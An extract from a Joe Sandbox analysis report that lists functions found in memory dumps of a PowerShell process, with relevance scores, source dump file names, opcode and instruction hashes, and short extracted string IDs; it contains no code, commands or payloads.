                                            Function 073BB260 Relevance: 23.2, Strings: 18, Instructions: 680COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                            • API String ID: 0-855738717
                                            • Opcode ID: ad652d0e30a82dbc1781ba5b9e7bf8f9bedc9688fc2df8da505cc74dbb419506
                                            • Instruction ID: 90ae72ba329bf90ac0290cec007c0fb69282b300cf4c999d8bda5f289340a2bd
                                            • Opcode Fuzzy Hash: ad652d0e30a82dbc1781ba5b9e7bf8f9bedc9688fc2df8da505cc74dbb419506
                                            • Instruction Fuzzy Hash: 5D32F6F1B003068FEB349E6988517EAF7E6AFC5210F14807AD64ACBA51DF31D945CBA1
                                            Function 073B5C80 Relevance: 18.1, Strings: 14, Instructions: 615COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q
                                            • API String ID: 0-1185439275
                                            • Opcode ID: 6bdd3ab3cdbed2e33c400a50fff4e74d710fd692e7b720e316fab978b3694548
                                            • Instruction ID: 53a681445c59e4af18476fafaf9dfdbc121d314867ac7e720c115b9dcac003bf
                                            • Opcode Fuzzy Hash: 6bdd3ab3cdbed2e33c400a50fff4e74d710fd692e7b720e316fab978b3694548
                                            • Instruction Fuzzy Hash: 7E123BB1605306CFFB358B65C8516EABBA1EF86210F1880AAD64DCF653DB31D812C752
                                            Function 073B91A8 Relevance: 13.5, Strings: 10, Instructions: 1039COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq
                                            • API String ID: 0-3075684691
                                            • Opcode ID: f6eda1078a8c9f5d45d73bce3d60e4b79202ff2d945c95b7e1c742ea9fc77136
                                            • Instruction ID: 01f9765d1bae01de6609cd8be1a2a2c9cf45ab649878e145ecebec94f222cf1b
                                            • Opcode Fuzzy Hash: f6eda1078a8c9f5d45d73bce3d60e4b79202ff2d945c95b7e1c742ea9fc77136
                                            • Instruction Fuzzy Hash: 379273B4E00315CFEB34DB68C850B9AB7F2AB85314F14C4AAD6099BB55CB31ED46CB91
                                            Function 073BE920 Relevance: 9.4, Strings: 7, Instructions: 682COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$tPq$$q
                                            • API String ID: 0-3302581459
                                            • Opcode ID: 1a5d6536c4c0f227c6e22e2d44faad01c22a4f475ca30bdac8b38bd33df0b71d
                                            • Instruction ID: ea34d3d0d1cc1828fd6df13cfe48d1dde4d1b49e1b5ddffd9e5fd92833eb50ec
                                            • Opcode Fuzzy Hash: 1a5d6536c4c0f227c6e22e2d44faad01c22a4f475ca30bdac8b38bd33df0b71d
                                            • Instruction Fuzzy Hash: 3342B8B5A00305DFEB34DF68C840BEAB7B2AF85314F15846AE6095BB51CB35E846CB91
                                            Function 0305C670 Relevance: 9.3, Strings: 7, Instructions: 522COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8N>k$h]>k$h]>k$h]>k$$q$$q$I>k
                                            • API String ID: 0-1435964878
                                            • Opcode ID: f92039ab4676ae40696e982b901659275ca93e602dd93266b7060e0d9702fe88
                                            • Instruction ID: 571288cc9323e424fa2d209183c8802a45efbd9eaa307227bd4839b350f3dd24
                                            • Opcode Fuzzy Hash: f92039ab4676ae40696e982b901659275ca93e602dd93266b7060e0d9702fe88
                                            • Instruction Fuzzy Hash: 46225F34B012188FDB25EB24C854BAEB7B6EF89344F1440E9E90AAB351DF359D46CF91
                                            Function 073BAC88 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-1794337482
                                            • Opcode ID: a76bedc654a3dc49e26157fad09e459042629b304a8e42c9135ba42a82e2cb04
                                            • Instruction ID: afe29ca10b789356524d1cd64e98d02e10ea6d8d089d164333c4a627a26bd5db
                                            • Opcode Fuzzy Hash: a76bedc654a3dc49e26157fad09e459042629b304a8e42c9135ba42a82e2cb04
                                            • Instruction Fuzzy Hash: ABD181B0A002058FE724DFA8C454BDEB7B3AF89304F64C42AE9096F755CB75ED428B91
                                            Function 073B3608 Relevance: 5.6, Strings: 4, Instructions: 589COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q
                                            • API String ID: 0-4210068417
                                            • Opcode ID: 42c64a7150a5fdb94d67426a63f9ef103f8b45963085f321aaa7ca7681156880
                                            • Instruction ID: 17814c8286d01b08f6704b20fc83bb08b460e2afcdf7f5f584add3f10e48cbdb
                                            • Opcode Fuzzy Hash: 42c64a7150a5fdb94d67426a63f9ef103f8b45963085f321aaa7ca7681156880
                                            • Instruction Fuzzy Hash: 36123AF1B043258FFB358A6888517EA7BA2DFC6210F14847BD609DBB51DB31D846C792
                                            Function 073BAC69 Relevance: 4.0, Strings: 3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q
                                            • API String ID: 0-3126650252
                                            • Opcode ID: 105ed88404f784b510d83f78a97e6013432f281820bf666a799d485e583bc7d8
                                            • Instruction ID: 719699a4c93337d5f262f5aa6d6fb0afbefaa79b60d4750456ac116c6f536fc3
                                            • Opcode Fuzzy Hash: 105ed88404f784b510d83f78a97e6013432f281820bf666a799d485e583bc7d8
                                            • Instruction Fuzzy Hash: 97B1B1B4A002049FEB24DF64C850BDEBBB2AF89304F14C45AEA096F755CB35E846CF91
                                            Function 073B0A80 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q
                                            • API String ID: 0-3067366958
                                            • Opcode ID: c0d233ec62dd2843e959e576641be78fef8d3706904af9c48d76e234e13d6bda
                                            • Instruction ID: 40299c6c80f585d0b04fe022b5caed3052d95dedde1c6f430133352a71ec7c16
                                            • Opcode Fuzzy Hash: c0d233ec62dd2843e959e576641be78fef8d3706904af9c48d76e234e13d6bda
                                            • Instruction Fuzzy Hash: 4E411CB2B002168BEB389A6989407EBF7E6EFC5614B14846ADA09E7741DF31D901C7A1
                                            Function 073B8188 Relevance: 3.5, Strings: 2, Instructions: 971COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: e9f377d16ea8c5bf17558dc6fc906992593b1b19411e41388dc31ea99b7ac1b8
                                            • Instruction ID: 8b18ea2f31bdc481bdace36b7e380f0fdb1c5d863cea78f3f3557765b7d2bd5c
                                            • Opcode Fuzzy Hash: e9f377d16ea8c5bf17558dc6fc906992593b1b19411e41388dc31ea99b7ac1b8
                                            • Instruction Fuzzy Hash: EF923EB4B00215CFEB24DB68C840B9AB7F2AB85304F14C0A9D64D9B755DB72ED86CF91
                                            Function 073B9BBB Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: 08b1eb00ff69f883475d7b101c1c4eb6ac9cac3e84b5020523ef61262d9ac813
                                            • Instruction ID: 306aa4972fdf3b17c771fa9e3f1ea3d4d0c7396b0b012f8e982096012b994ad4
                                            • Opcode Fuzzy Hash: 08b1eb00ff69f883475d7b101c1c4eb6ac9cac3e84b5020523ef61262d9ac813
                                            • Instruction Fuzzy Hash: 86F131B0A002159FE724DB64C950BAEB7F3ABC4304F14C4A9E6096F795CB75ED828F91
                                            Function 073BEE48 Relevance: 2.8, Strings: 2, Instructions: 299COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: 488e7b1344a6bafd15e7a9c2bbf9ebb7bc93681207034ed4c536baff3466cb04
                                            • Instruction ID: 51f76ecefad1f7952bda74c2247a4eddef1fb43c83a2b726cd0216b9b195d072
                                            • Opcode Fuzzy Hash: 488e7b1344a6bafd15e7a9c2bbf9ebb7bc93681207034ed4c536baff3466cb04
                                            • Instruction Fuzzy Hash: BEC161B4A003069BEB24DF94C840BAEB7F2AF84714F159429E5096BB55CB31F846CF91
                                            Function 073BBC5E Relevance: 2.6, Strings: 2, Instructions: 114COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: 7f1bd5ec88227cf2791d230319ac8e9e96adfaae1d7ab2bf692484fae76e56e7
                                            • Instruction ID: 3ce1fce0a651b688183d9c9b18f46c8f49c9d7e91be7c63a8b32231ac77fadc0
                                            • Opcode Fuzzy Hash: 7f1bd5ec88227cf2791d230319ac8e9e96adfaae1d7ab2bf692484fae76e56e7
                                            • Instruction Fuzzy Hash: B5316BF2700245CBFB309A7988603EEF7A69BC5214B54847FE74A8BB51DE25C802C761
                                            Function 0305D328 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: h]>k$I>k
                                            • API String ID: 0-3817456764
                                            • Opcode ID: fc6df2a96d830b42b128eb241dbc0ee170c9aeaf32d81e4c68a5e80cf28eb3fa
                                            • Instruction ID: 552541cbcce7d1fc8eaee6d62269d5c62f06d8f02cabb83bd4b99a8f877ae493
                                            • Opcode Fuzzy Hash: fc6df2a96d830b42b128eb241dbc0ee170c9aeaf32d81e4c68a5e80cf28eb3fa
                                            • Instruction Fuzzy Hash: 30312E34B011188FCB25DB64C854BEEB7B2AF89304F1444EAD909AB351DB359E85CF91
                                            Function 073B0A61 Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q
                                            • API String ID: 0-3126353813
                                            • Opcode ID: 75d62212069339f6a04077ca36ecb6f32486aa00309792ec70e6a3d483e776f3
                                            • Instruction ID: 584a9d2b9bce54716d28ff2839648108e1fa797ceb80c210e409cd2486e01969
                                            • Opcode Fuzzy Hash: 75d62212069339f6a04077ca36ecb6f32486aa00309792ec70e6a3d483e776f3
                                            • Instruction Fuzzy Hash: 662125F69043169FDB389F6489412EABBB4FF45610B2A45A7CE0CE7641D730C940C7A1
                                            Function 073B816A Relevance: 2.0, Strings: 1, Instructions: 774COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q
                                            • API String ID: 0-1807707664
                                            • Opcode ID: f6d4562d68179d1cc2285e368fd1c7bd43506e7a9ce48ebb09ced261c134bb5e
                                            • Instruction ID: 206b2afa56a15b7a6e296768f6e79f5f09cff1aff717f7ae5afcbe9c46dc8618
                                            • Opcode Fuzzy Hash: f6d4562d68179d1cc2285e368fd1c7bd43506e7a9ce48ebb09ced261c134bb5e
                                            • Instruction Fuzzy Hash: 92722AB4B00215CFEB24DB54C840B9AB7F6AB85304F15C0A9DA4DAB752CB72ED85CF91
                                            Function 073B8D88 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q
                                            • API String ID: 0-1807707664
                                            • Opcode ID: ff45f7614ab3db78aef44d651a9edc14cdca78b49db3080ad4146396d16568bd
                                            • Instruction ID: bedcab658c6a74f8d9c26fb3f8b26747102d8ea2ded1426607bc8ebf71765c94
                                            • Opcode Fuzzy Hash: ff45f7614ab3db78aef44d651a9edc14cdca78b49db3080ad4146396d16568bd
                                            • Instruction Fuzzy Hash: D3222DB4B00215CFEB24DB64C850B9AB7B2BB85304F54C0A9DA4DAB751CB72ED85CF91
                                            Function 073BBC77 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q
                                            • API String ID: 0-1807707664
                                            • Opcode ID: 82f02949c6dc521cce0205978cfd4484b6d015650ad2abe83695c622e2767a7e
                                            • Instruction ID: a740aa88ef6750cb93c2d0ff2d134669ae29e955a1d8bfbf6ac4f98347eef758
                                            • Opcode Fuzzy Hash: 82f02949c6dc521cce0205978cfd4484b6d015650ad2abe83695c622e2767a7e
                                            • Instruction Fuzzy Hash: 1101DBF270024197FB345E6498A07FDB2528BC0244F90447EEB0A5FA51CF69D945C772
                                            Function 073BA1AB Relevance: .4, Instructions: 446COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9978b87176cd641387e769a4a95b4041c4fc4a491325a2374997609fc174f0d9
                                            • Instruction ID: 0861dc89742a82a4fad1daf3bf446f92d28517423ca02be6dffd60d05b77b41e
                                            • Opcode Fuzzy Hash: 9978b87176cd641387e769a4a95b4041c4fc4a491325a2374997609fc174f0d9
                                            • Instruction Fuzzy Hash: 4C0260B4A00715DFEB30CB94C840B9AB7F2AB89314F15C49ADA496BB55CB31ED42CF91
                                            Function 030539B0 Relevance: .3, Instructions: 318COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4526525029398dd708d8012f81daa72d09254d9db045d180f0019b0884ec7953
                                            • Instruction ID: b451862ea80a83c3f5b99dee80990d9e8474325dff813f386263ab7e4252b06f
                                            • Opcode Fuzzy Hash: 4526525029398dd708d8012f81daa72d09254d9db045d180f0019b0884ec7953
                                            • Instruction Fuzzy Hash: 72D1F838A012099FDB55CF98D584A9EFBF2FF48350F288599E805AB355C731EC82CB90
                                            Function 0305A1C0 Relevance: .3, Instructions: 313COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 872755fcdf856e54058f4beb98f458b0fbba73505b5df7e97670de1177f50c50
                                            • Instruction ID: d2915088ae1f851cd9cde42aedcf2a7a3cc9e462371d1d4c630119ee0b50d340
                                            • Opcode Fuzzy Hash: 872755fcdf856e54058f4beb98f458b0fbba73505b5df7e97670de1177f50c50
                                            • Instruction Fuzzy Hash: C8C16D35B012088FCB15DFA4D884AAEBBF6FF85314F154659E806AF665CB34ED89CB40
                                            Function 073B7D80 Relevance: .3, Instructions: 275COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cb125e2a0277399ab2a45e8567ad35f4e4c7f9762eede8288b5fe74ef9df4355
                                            • Instruction ID: fc28747e630c4aa4bac630310ddb566dd929ccc39f079a30634f98482f8cfd7d
                                            • Opcode Fuzzy Hash: cb125e2a0277399ab2a45e8567ad35f4e4c7f9762eede8288b5fe74ef9df4355
                                            • Instruction Fuzzy Hash: 62A141B0B002059BE724DBA8C544B9EB7E3EFC9354F14846AE5096F755CB72EC42CB92
                                            Function 073BA568 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c504b5b1f9603ee58919f1b47bcec21c31af0194b5ec1ed0a2c2ebdc0e18460
                                            • Instruction ID: 027be4edb5dacf6932264dd0b6dce1856eb1824ad23b28b7d8eb4c90a459daa7
                                            • Opcode Fuzzy Hash: 1c504b5b1f9603ee58919f1b47bcec21c31af0194b5ec1ed0a2c2ebdc0e18460
                                            • Instruction Fuzzy Hash: 70A150F4E00B05DBEB30DF94C441AAAB7F2AF89314F15C42EDA5A6BA54C731E846CB51
                                            Function 073B7D61 Relevance: .3, Instructions: 253COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c8cd183ae9b624110ce657f22582da4cf4476651f6146d57927a9805cfc4cbb
                                            • Instruction ID: c6f8184ab47f3124dcc145793c9c0265059127bbcfdcf31b0f3c745c2457b22c
                                            • Opcode Fuzzy Hash: 8c8cd183ae9b624110ce657f22582da4cf4476651f6146d57927a9805cfc4cbb
                                            • Instruction Fuzzy Hash: 13A15CB0A012059FE724DBA4C540BDAB7F3EF89304F14846AE6096BB55CB72EC41CF92
                                            Function 073BA590 Relevance: .2, Instructions: 250COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82eb5b283f9cf47136692b5d3dcc7fd5c26ccc26af7052045964cc1ef61136b3
                                            • Instruction ID: ed1b1ef560b3f4465ef3c8e88bafeebdbbcba86b8d8c8eb01ea758243db7d911
                                            • Opcode Fuzzy Hash: 82eb5b283f9cf47136692b5d3dcc7fd5c26ccc26af7052045964cc1ef61136b3
                                            • Instruction Fuzzy Hash: C7A15EF4E00B05DBEB30DF95C441AAAB7F2AF89314F14C42EDA5A6BA54C731E846CB51
                                            Function 0305A988 Relevance: .2, Instructions: 227COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e75f66e0ce3f77b444569df4c204a4cea06713f819ad079605c20b14663660e
                                            • Instruction ID: e315dd05a499cf3d16f90e6a8ff34c75edc315aae36828ec597485da4b3f6839
                                            • Opcode Fuzzy Hash: 5e75f66e0ce3f77b444569df4c204a4cea06713f819ad079605c20b14663660e
                                            • Instruction Fuzzy Hash: 2A91C630A012488FCB15DF68C880AAEBBF6FF85354F148669E8569B355DB71AC46CF90
                                            Function 03059A28 Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 18e8e6a1b586f71e4da26ac70ffc760f1f9d4a5907d5b5d7e776111818817f54
                                            • Instruction ID: a3d1a67b07689cf1d122d03855ffad93a23039c8094b8650c9504964c5ec736e
                                            • Opcode Fuzzy Hash: 18e8e6a1b586f71e4da26ac70ffc760f1f9d4a5907d5b5d7e776111818817f54
                                            • Instruction Fuzzy Hash: 79819034A06204DFCB15DFA8D8849AEBBF2FF89210F1984A9E8459B761C735EC45CF50
                                            Function 073B35ED Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7336bffbb6cd60c364f256ee78db5e1c7718273d31cec4fa89626e1cf2aaf59b
                                            • Instruction ID: 6e7427ca263cea00a935a0d98abfac5ff00df0b5904561cc30ebc232e8b7ed3f
                                            • Opcode Fuzzy Hash: 7336bffbb6cd60c364f256ee78db5e1c7718273d31cec4fa89626e1cf2aaf59b
                                            • Instruction Fuzzy Hash: ED41F2F1B003228FFB308E548982BFA77A2EB85314F158466DA089BF51DB35D945CBA1
                                            Function 0305A973 Relevance: .1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3cdca4c0050c7de586aa4d777863feab6971c56ac6c4b68440a913c7cdddaf26
                                            • Instruction ID: b7050215c8b54b06fdc41035aaff671dd3bcfb75f7e05471c5692413beca9f0f
                                            • Opcode Fuzzy Hash: 3cdca4c0050c7de586aa4d777863feab6971c56ac6c4b68440a913c7cdddaf26
                                            • Instruction Fuzzy Hash: 4D418D70E012489FDB25DFA9C8847AEBBF2BF85344F148569E406AB394DB74AC85CF50
                                            Function 0305A719 Relevance: .1, Instructions: 118COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2e1d918f097d965303bb7b1eb7f71b458fe583438877c696943dac6715147282
                                            • Instruction ID: 6aedca2d37467c12014dae924752bc7e2edabfd43c1ec2f6589729431e7e766c
                                            • Opcode Fuzzy Hash: 2e1d918f097d965303bb7b1eb7f71b458fe583438877c696943dac6715147282
                                            • Instruction Fuzzy Hash: F841A234B012148FDB15DF24C998AAEBBF2FF89314F1945A8E846EB7A0CB349C41CB50
                                            Function 073BB0AE Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10de56b9b701ca8a094d4808dfc4ccacc11f8c4c2343662dabeb77ff886fff07
                                            • Instruction ID: 70cd29c32d95177acf58aad8d4e0847a97aaddb0fd04c6c2465d100ce69f7511
                                            • Opcode Fuzzy Hash: 10de56b9b701ca8a094d4808dfc4ccacc11f8c4c2343662dabeb77ff886fff07
                                            • Instruction Fuzzy Hash: 1E3190B0B402049BF724ABA4C854BAF76A3DBC5344F10C425E9056F791CF76ED028F91
                                            Function 073B0E18 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
